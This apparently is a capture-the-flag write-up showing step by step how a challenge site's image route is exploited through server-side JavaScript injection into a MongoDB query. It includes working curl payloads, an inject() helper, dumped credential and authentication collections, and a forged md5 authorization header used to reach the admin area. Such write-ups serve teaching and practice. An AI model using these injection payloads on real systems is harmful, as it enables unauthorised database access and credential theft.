The web page states that the auther is going to learn JS & SQL. So let's focus on the JS: ``` $(document).ready(function() { $("img").each(function() { var t = $(this), i = t.attr("id"); $.get("/get/image/" + i, function(i) { t.attr("src", i) }) }), $("p").each(function() { var t = $(this), i = t.attr("id"); $.get("/get/text/" + i, function(i) { t.html(i) }) }); var j = '/admin_area'; $("h2").each(function() { var t = $(this), i = t.attr("id"); $.get("/get/title/" + i, function(i) { t.html(i) }) }) }); ``` There are 3 types of xhr: * /get/image/[id] * /get/text/[id] * /get/image/[id] and one url: * /admin_area First try to exploit 3 xhr: > $ curl "http://206.189.54.119:5000/get/image/'" > > Not Found > > $ curl "http://206.189.54.119:5000/get/text/'" > > Not Found. > > $ curl "http://206.189.54.119:5000/get/title/'" > > Not Found. Not exploitable? Take a closer look? > $ curl -v "http://206.189.54.119:5000/get/image/'" > > < Application-Error: exception: SyntaxError: Unexpected token ILLEGAL > > Not Found Try something else: > $ curl -v "http://206.189.54.119:5000/get/image/xxx" > > < Application-Error: exception: ReferenceError: xxx is not defined near > 'x});return res;' > > Not Found See the code? Try it: (%2F%2F to comment out the rest, escaping %20/%2F to make it match the route) > $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;%2F%2F" > > < Application-Error: exception: SyntaxError: Unexpected end of input > > Not Found Something missing? maybe end of block/function? > $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;}%2F%2F" > > /images/sd4x_378x225.jpg OK. worked! Now inject something to return: > $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{1:1};}%2F%2F" > > < Application-Error: Couln't find "picture_path" property in returning > object from database. > > Not Found Change the key: > $ curl -v -g > "http://206.189.54.119:5000/get/image/1});return{'picture_path':'hello'};}%2F%2F" > > hello Injection suceed! Now we have the injection point: ``` inject() { curl -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':tojson($1)}}%2F%2F" } inject(this) ``` and got some code piece: ``` ... this._db = db; ... "_mongo" : connection to EMBEDDED, "db" : personal_site, ... ``` The site uses mongodb, and we have access to db. ``` inject 'db.getCollectionNames()' ``` > [ > "authentication", > "contents", > "credentials", > "images", > "system.indexes", > "titles" > ] ``` inject 'db.authentication.find({}).toArray()' inject 'db.credentials.find({}).toArray()' ``` ``` [ { "_id" : ObjectId("5ae63ae0a86f623c83fecfb3"), "id" : 1, "method" : "post_data", "format" : "username=[username]&password=[password]", "activate" : "false" }, { "_id" : ObjectId("5ae63ae0a86f623c83fecfb4"), "id" : 2, "method" : "header", "format" : "md5(se3cr3t|[username]|[password])", "activate" : "true" }, { "_id" : ObjectId("5ae66f87dbf0b5383518fc3d"), "id" : 50, "activate" : false } ][ { "_id" : ObjectId("5ae63ae0a86f623c83fecfb1"), "id" : 1, "username" : "administrator", "password" : "H4rdP@ssw0rd?" }, { "_id" : ObjectId("5ae63ae0a86f623c83fecfb2"), "id" : 2, "username" : "user", "password" : "epass" } ] ``` Now we have the authentication method and credentials, we can try accessing /admin_area > $ curl "http://206.189.54.119:5000/admin_area" > > authorization_token not found From above, the only activated authentication method is via header, with format "md5(se3cr3t|[username]|[password])" > curl "http://206.189.54.119:5000/admin_area" -H "authorization_token: > 2cc348195dc1ab9842f9446b41ef650b" > > ASIS{3c266f6ccdaaef52eb4a9ab3abc2ca70}